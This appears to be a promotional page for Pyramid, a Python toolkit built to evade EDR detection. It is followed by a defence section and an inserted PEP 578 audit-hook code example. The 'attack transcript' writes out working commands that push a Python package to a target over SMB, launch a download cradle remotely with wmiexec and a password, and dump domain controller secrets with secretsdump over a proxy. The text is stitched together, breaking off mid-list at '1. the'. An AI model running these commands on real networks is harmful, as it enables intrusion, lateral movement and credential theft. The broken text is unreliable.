Pyramid – A Tool To Help Operate In EDRs’ Blind Spots

What is it

Pyramid is a set of Python scripts and module dependencies that can be used to evade EDRs. The main purpose of the tool is to perform offensive tasks by leveraging some Python evasion properties and looking like legitimate Python application usage. This can be achieved because:

  1. the

    The attack transcript is reported below:

    Start Pyramid Server:

    python3 PyramidHTTP.py 443 testuser Sup3rP4ss! /home/nak/projects/dev/Proxy/Pyramid/key.pem /home/nak/projects/dev/Proxy/Pyramid/cert.pem /home/nak/projects/dev/Proxy/Pyramid/Server/

    Save the base download cradle to cradle.py.

    Copy the unpacked Windows embeddable package (with cradle.py) to the target:

    smbclient //192.168.1.11/C$ -U domain/user -c 'prompt OFF; recurse ON; lcd /home/user/Downloads/python-3.10.4-embed-amd64; cd Users\Public; mkdir python-3.10.4-embed-amd64; cd python-3.10.4-embed-amd64; mput *'

    Execute pythonw.exe to launch the cradle:

    /usr/share/doc/python3-impacket/examples/wmiexec.py domain/user:"Password1!"@192.168.1.11 'C:\Users\Public\python-3.10.4-embed-amd64\pythonw.exe C:\Users\Public\python-3.10.4-embed-amd64\cradle.py'

    The Socks5 server is now running on the target and the SSH tunnel should be up, so modify proxychains.conf and tunnel traffic through the target:

    proxychains impacket-secretsdump domain/user:"Password1!"@192.168.1.50 -just-dc

    Limitations

    Dynamically loading Python modules does not natively support importing *.pyd files, which are essentially DLLs. The only public solution to my knowledge that solves this problem is provided by Scythe (in-memory-execution) by re-engineering the CPython interpreter. In order not to lose the digital signature, one solution that would allow using the native Python embeddable package involves dropping the required pyd files or wheels on disk. This should not have significant OPSEC implications in most cases; however, bear in mind that the following wheels containing pyd files are dropped on disk to allow dynamic loading to complete:

    • Cryptodome – needed by Bloodhound-Python, Impacket, DonPAPI and LaZagne
    • bcrypt, cryptography, nacl, cffi – needed by paramiko
    • please note that running BOFs does not need dropping any pyd on disk, since this technique only involves shellcode injection.

    How to defend from this technique

    Python.exe is a signed binary with good reputation and does not provide visibility on Python dynamic code. Pyramid exploits these evasion properties by carrying out offensive tasks from within the same python.exe process.

    For this reason, one of the most efficient solutions would be to block by default binaries and DLLs signed by Python Foundation, creating exceptions only for users who actually need to use Python binaries.

    Alerts on downloads of embeddable packages can also be raised.

    Deploying PEP-578 is also feasible, although complex; this is a sample implementation. However, deploying PEP-578 without blocking the usage of stock Python binaries could make this countermeasure useless.
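    A minimal PEP 578 audit hook in the spirit of the sample implementation referred to above, written here as an added example (it is neither Pyramid's code nor the linked sample) and assuming CPython 3.8 or later with the standard audit event names compile, exec, ctypes.dlopen and socket.connect. It records, and can optionally block, code compiled or executed under a pseudo filename such as <string>, native library loads through ctypes, and outbound connections, which is the kind of in-memory activity a download cradle inside python.exe produces.

```python
import sys

# Added example (not Pyramid's code). Assumes CPython >= 3.8 (PEP 578).
# Event names/argument layouts follow the CPython audit-events table.
WATCHED = {"compile", "exec", "ctypes.dlopen", "socket.connect"}

def _memory_code_reason(filename):
    """Flag code whose 'file name' is a pseudo name such as <string>, i.e.
    source that never existed on disk. Frozen stdlib modules are normal."""
    name = "<unknown>" if filename is None else str(filename)
    if name.startswith("<frozen"):
        return None
    if filename is None or name.startswith("<"):
        return "code compiled/executed from memory (%s)" % name
    return None

def classify(event, args):
    """Return a reason string for a suspicious event, or None if benign."""
    if event == "compile":          # args: (source, filename)
        return _memory_code_reason(args[1])
    if event == "exec":             # args: (code_object,)
        return _memory_code_reason(args[0].co_filename)
    if event == "ctypes.dlopen":    # args: (name,): native code load
        return "native library loaded via ctypes: %s" % (args[0],)
    if event == "socket.connect":   # args: (socket, address)
        return "outbound connection to %s" % (args[1],)
    return None

class AuditRecorder:
    """PEP 578 hook that records (and optionally blocks) flagged events. The
    hook must not trigger audit events itself (no logging, no open()), or it
    recurses; findings are therefore only appended to a list."""
    def __init__(self, block=False):
        self.block = block
        self.findings = []

    def __call__(self, event, args):
        if event not in WATCHED:
            return
        reason = classify(event, args)
        if reason is not None:
            self.findings.append((event, reason))
            if self.block:  # raising from a hook aborts the audited operation
                raise RuntimeError("blocked %s: %s" % (event, reason))

    def install(self):
        sys.addaudithook(self)  # hooks cannot be removed once added
```

    A hook only covers the interpreter it is installed in, so an attacker who brings an unhooked embeddable package bypasses it entirely; this is why the text above pairs PEP-578 with blocking stock Python binaries.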

    Download Pyramid
